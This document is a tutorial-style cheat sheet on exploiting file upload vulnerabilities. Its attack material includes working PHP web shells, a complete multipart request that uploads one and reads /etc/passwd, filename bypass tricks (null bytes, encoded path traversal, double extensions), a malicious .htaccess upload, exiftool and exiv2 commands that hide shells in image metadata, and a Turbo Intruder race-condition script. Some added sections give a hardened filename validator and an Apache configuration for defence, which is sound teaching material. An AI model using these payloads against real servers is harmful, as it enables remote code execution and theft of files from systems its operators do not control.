File Upload

Uploading a file to a website that does not properly validate it.

File upload vulnerabilities arise when a web server lets users upload files to its filesystem without sufficiently validating the file's name, type, contents or size. If the uploaded file is later served from a location where the server executes it (for example a .php file inside the web root), the upload becomes remote code execution.

"Content-Type" header of the request:

  • Simple text such as a name or address: "application/x-www-form-urlencoded"

  • Large amounts of binary data, such as an image or a PDF: "multipart/form-data", with a "boundary" parameter that separates the parts

"Content-Disposition" header:

  • When the request body is split into separate parts, each part starts with a "Content-Disposition" header that gives basic information about the input field: its "name" and, for file inputs, the client-supplied "filename".

  • A file part also carries its own "Content-Type" header telling the server the MIME type of the submitted data. Both the filename and this MIME type are set by the client, so an attacker controls them completely.

Exploiting

PHP web shell upload

// Send in an HTTP request body: read an arbitrary file
<?php echo file_get_contents('/path/to/target/file'); ?>

// Send in an HTTP request body: execute a command passed in the query string
<?php echo system($_GET['command']); ?>

// Usage in an HTTP GET request
GET /example/exploit.php?command=id HTTP/1.1

Example:

// Edit the HTTP request with Burp Suite Proxy (or resend it from Repeater)
POST /my-account/avatar HTTP/1.1
Host: test.net
Content-Type: multipart/form-data; boundary=---------------------------4714704787410783474211833593
Content-Length: 523

-----------------------------4714704787410783474211833593
Content-Disposition: form-data; name="avatar"; filename="f.php"
Content-Type: image/png

<?php echo file_get_contents('/etc/passwd'); ?>
-----------------------------4714704787410783474211833593
Content-Disposition: form-data; name="user"

TEST
-----------------------------4714704787410783474211833593--
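The same upload request, generated programmatically. This is an added Python example, not code from the original page; the host, path and form field names are placeholder assumptions. It shows the CRLF framing of a multipart body, the per-part "filename" and "Content-Type" that the client chooses freely, a Content-Length computed from the real body, and the closing boundary with its trailing "--". The filename is inserted verbatim, so bypass names from the later sections (for example ones containing "%00" or "..%2f") reach the server unchanged.

```python
import secrets

# Constructed sample values (assumptions, not a real target).
HOST = "test.net"
PATH = "/my-account/avatar"


def build_multipart_upload(fields, file_field, filename, file_content_type, file_bytes):
    """Return (headers, body) for a multipart/form-data POST.

    `filename` and `file_content_type` are copied verbatim into the part
    headers: that is exactly what the server sees, and exactly what an
    attacker controls, so neither value can be trusted server-side.
    """
    boundary = "----WebKitFormBoundary" + secrets.token_hex(8)
    bnd = boundary.encode()
    crlf = b"\r\n"
    parts = []
    # Ordinary text fields: one header line, blank line, value.
    for name, value in fields.items():
        parts.append(
            b"--" + bnd + crlf
            + f'Content-Disposition: form-data; name="{name}"'.encode() + crlf
            + crlf
            + value.encode() + crlf
        )
    # File field: adds filename= and a part-level Content-Type.
    parts.append(
        b"--" + bnd + crlf
        + f'Content-Disposition: form-data; name="{file_field}"; filename="{filename}"'.encode() + crlf
        + f"Content-Type: {file_content_type}".encode() + crlf
        + crlf
        + file_bytes + crlf
    )
    # The final boundary carries a trailing "--"; without it many parsers
    # treat the body as truncated and discard the last part.
    body = b"".join(parts) + b"--" + bnd + b"--" + crlf
    headers = {
        "Content-Type": f"multipart/form-data; boundary={boundary}",
        "Content-Length": str(len(body)),
    }
    return headers, body


def raw_request(host, path, headers, body):
    """Serialise the request the way it would appear in Burp Repeater."""
    head = f"POST {path} HTTP/1.1\r\nHost: {host}\r\n"
    head += "".join(f"{k}: {v}\r\n" for k, v in headers.items())
    return head.encode() + b"\r\n" + body


if __name__ == "__main__":
    payload = b"<?php echo file_get_contents('/etc/passwd'); ?>"
    hdrs, body = build_multipart_upload({"user": "TEST"}, "avatar", "f.php", "image/png", payload)
    print(raw_request(HOST, PATH, hdrs, body).decode(errors="replace"))
```

Paste the printed request into Repeater, or send the bytes over a socket; the point of generating it is that every field an upload handler might check is under your control and nothing in the framing changes when the filename does.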

Web shell upload via path traversal

If the upload directory is configured so that scripts in it are not executed, try to write the file somewhere else. Servers often strip plain "../" sequences but URL-decode the filename afterwards, so an encoded traversal sequence can survive the check and be applied when the file is written:

// Send file upload request:
Content-Disposition: form-data; name="avatar"; filename="..%2fexploit.php"

// Then request the file from the parent directory rather than the upload directory

Overriding the server configuration

Web servers can load directory-specific configuration from a file inside that directory, if the main configuration allows it. Uploading such a file lets you change how the server treats the other files you upload (for example, mapping a new extension to the PHP handler):

  • IIS Server: "web.config"

  • Apache Server: ".htaccess"

Obfuscating file extensions

Even exhaustive blacklists can potentially be bypassed using classic obfuscation techniques.

In the "Content-Disposition" header, change the value of the "filename" parameter, for example:

Content-Disposition: form-data; name="avatar"; filename="exploit.php%00.jpg"

Other variants:

- Different case (beats a case-sensitive check): exploit.pHp
- Multiple extensions (depends on which one the server honours): exploit.php.jpg
- Trailing characters that are stripped when the file is written: exploit.php. (trailing dot or whitespace)
- A filter that removes the forbidden string only once: exploit.p.phphp becomes exploit.php after ".php" is stripped
- URL encoding (or double URL encoding) of dots, slashes and other characters: exploit%2Ephp
- Semicolons or URL-encoded null bytes before the real extension, which truncate the name in some languages and libraries: exploit.asp;.jpg or exploit.asp%00.jpg
- Multibyte Unicode sequences that some components normalise to a dot: \xC0\x2E, \xC4\xAE or \xC0\xAE
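To make the list concrete, here is an added Python example, not code from the original page, that models three common weak checks which the path-traversal and obfuscated filenames above defeat, next to one hardened check that decodes and normalises the name before allow-listing only the final extension and then discards the client's name altogether. The function names and the allowed-extension set are assumptions for illustration.

```python
import os
import re
from urllib.parse import unquote

# --- Weak checks modelled on common mistakes (constructed for illustration) ---

def blacklist_endswith(filename):
    """Accepts anything that does not end in an exact, case-sensitive '.php'."""
    return not filename.endswith(".php")


def blacklist_strip_once(filename):
    """Removes the forbidden extension once and trusts the result."""
    return filename.replace(".php", "", 1)


def c_style_name(filename):
    """What a native library sees after decoding: the name ends at the first NUL."""
    return unquote(filename).split("\x00", 1)[0]


# --- Hardened check: normalise first, then allow-list the final extension ---

ALLOWED = {"jpg", "jpeg", "png", "gif"}   # assumed policy for an avatar upload


def safe_extension(filename):
    """Return the allow-listed extension, or None if the name is rejected.

    Decodes once, rejects control bytes, path separators and semicolons,
    drops any directory component, refuses dot-files such as .htaccess,
    and looks only at the LAST extension, lower-cased.
    """
    name = unquote(filename)
    if re.search(r"[\x00-\x1f\x7f/\\;]", name):
        return None
    name = os.path.basename(name)            # no traversal after decoding
    if name.startswith(".") or "." not in name:
        return None
    ext = name.rsplit(".", 1)[1].lower()
    return ext if ext in ALLOWED else None


def stored_name(filename):
    """Server-chosen name: random token plus the validated extension.

    Renaming means a double extension like exploit.php.jpg is stored as
    <random>.jpg, so nothing the client chose reaches the filesystem.
    """
    ext = safe_extension(filename)
    if ext is None:
        raise ValueError("rejected upload filename")
    return f"{os.urandom(8).hex()}.{ext}"


if __name__ == "__main__":
    samples = ["exploit.pHp", "exploit.php.jpg", "exploit.php.", "exploit.p.phphp",
               "exploit%2Ephp", "exploit.asp;.jpg", "exploit.php%00.jpg",
               "..%2fexploit.php", ".htaccess", "avatar.PNG"]
    for s in samples:
        print(f"{s:20} endswith-ok={blacklist_endswith(s)!s:5} "
              f"strip-once={blacklist_strip_once(s):18} c-name={c_style_name(s)!r:22} "
              f"hardened={safe_extension(s)}")
```

Run it to see the table: every bypass from the list passes at least one of the weak checks, while the hardened check rejects all of them and only lets avatar.PNG and exploit.php.jpg through, both of which are then written under a random name with a harmless extension.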

Web shell upload via extension blacklist bypass (upload malicious .htaccess file)

Send the request that uploads a file to Burp Repeater, then:

  • Change the value of the "filename" parameter to ".htaccess".

  • Change the value of that part's "Content-Type" header to "text/plain".

  • Replace the file contents with: AddType application/x-httpd-php .l33t

  • Send the request. Apache now treats files with the ".l33t" extension in that directory as PHP (this only works if the server's configuration lets .htaccess override FileInfo settings for the directory).

  • Resend the original request with your PHP payload, this time with "filename" set to "exploit.l33t".

  • The web shell is now uploaded and will execute when requested.
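The technique depends on Apache honouring a per-directory .htaccess in the upload location. The following Apache configuration fragment is an added example, not from the original page or any named project, and the directory path is an assumption. It places the permissive setting that enables the bypass beside a hardened block for the upload tree that disables overrides and refuses to treat or serve anything there as a script:

```apache
# Weak: an uploaded .htaccess is honoured, so "AddType application/x-httpd-php .l33t" works
<Directory "/var/www/html/uploads">
    AllowOverride All
</Directory>

# Hardened: no per-directory overrides and no script handling in the upload tree
<Directory "/var/www/html/uploads">
    AllowOverride None
    Options -ExecCGI -Includes
    # Undo any PHP handler/type mapping inherited from the server or vhost level
    RemoveHandler .php .phtml .phar
    RemoveType .php .phtml .phar
    # Refuse outright to serve anything that still looks like a script or a config file;
    # this holds even if PHP is wired up elsewhere with a server-wide SetHandler
    <FilesMatch "\.(php[0-9]?|phtml|phar|htaccess)$">
        Require all denied
    </FilesMatch>
</Directory>
```

Storing uploads outside the document root and serving them through a handler that sets a fixed Content-Type removes the problem entirely; the block above is the fallback when files must live under the web root.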

Remote code execution via polyglot web shell upload

// exiftool: add your PHP payload to the image's Comment field and write the result as a .php file
$ exiftool -Comment="<?php echo 'START ' . file_get_contents('/home/path/secret_file') . ' END'; ?>" icon.png -o polyglot.php

// exiv2: set the JPEG comment (-c) to a PHP web shell; the PHP array key uses double quotes so the single-quoted shell argument is not broken
$ exiv2 -c 'A "<?php system($_REQUEST["cmd"]); ?>"!' backdoor.jpeg

The result is a polyglot PHP/JPG file: fundamentally a normal image, but with your PHP payload in its metadata, so it passes checks that inspect the image (magic bytes, dimensions) and still executes if the server serves it as PHP.

Exploiting file upload race conditions

Example:

In the vulnerable application's source code (not reproduced here), the uploaded file is first moved to a web-accessible folder and only then checked for viruses.

Malicious files are removed only once the virus check completes, so there is a small time window in which the file can be requested and executed before it is deleted. To exploit this, use Turbo Intruder to send the upload and a burst of requests for the uploaded file at almost the same time.

Turbo Intruder is a Burp Suite extension for sending large numbers of HTTP requests and analysing the results.

# Turbo Intruder script (Jython, run inside Burp); RequestEngine and table are provided by the extension
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=10)

    request1 = '''<YOUR-POST-REQUEST>'''  # Upload request carrying the web shell

    request2 = '''<YOUR-GET-REQUEST>'''   # Request for the uploaded web shell's URL

    # Queue the upload and several fetches behind the same gate: Turbo Intruder holds
    # back the last byte of each request until the gate opens, so all of them are
    # released together and the fetches land inside the deletion window
    engine.queue(request1, gate='race1')

    for x in range(5):
        engine.queue(request2, gate='race1')

    engine.openGate('race1')
    engine.complete(timeout=60)


def handleResponse(req, interesting):
    table.add(req)   # Show every response; look for the one whose body contains the shell output

Exploiting file upload vulnerabilities without RCE

Uploading malicious client-side scripts

If you can upload HTML files or SVG images, you can potentially use <script> tags (or event handlers) inside them to create stored XSS payloads, provided the file is served from the application's origin with a Content-Type the browser will render.

Exploiting vulnerabilities in the parsing of uploaded files

If you know that the server parses XML-based files, such as Microsoft Office .docx or .xlsx documents (ZIP archives of XML), this may be a potential vector for XXE injection attacks.
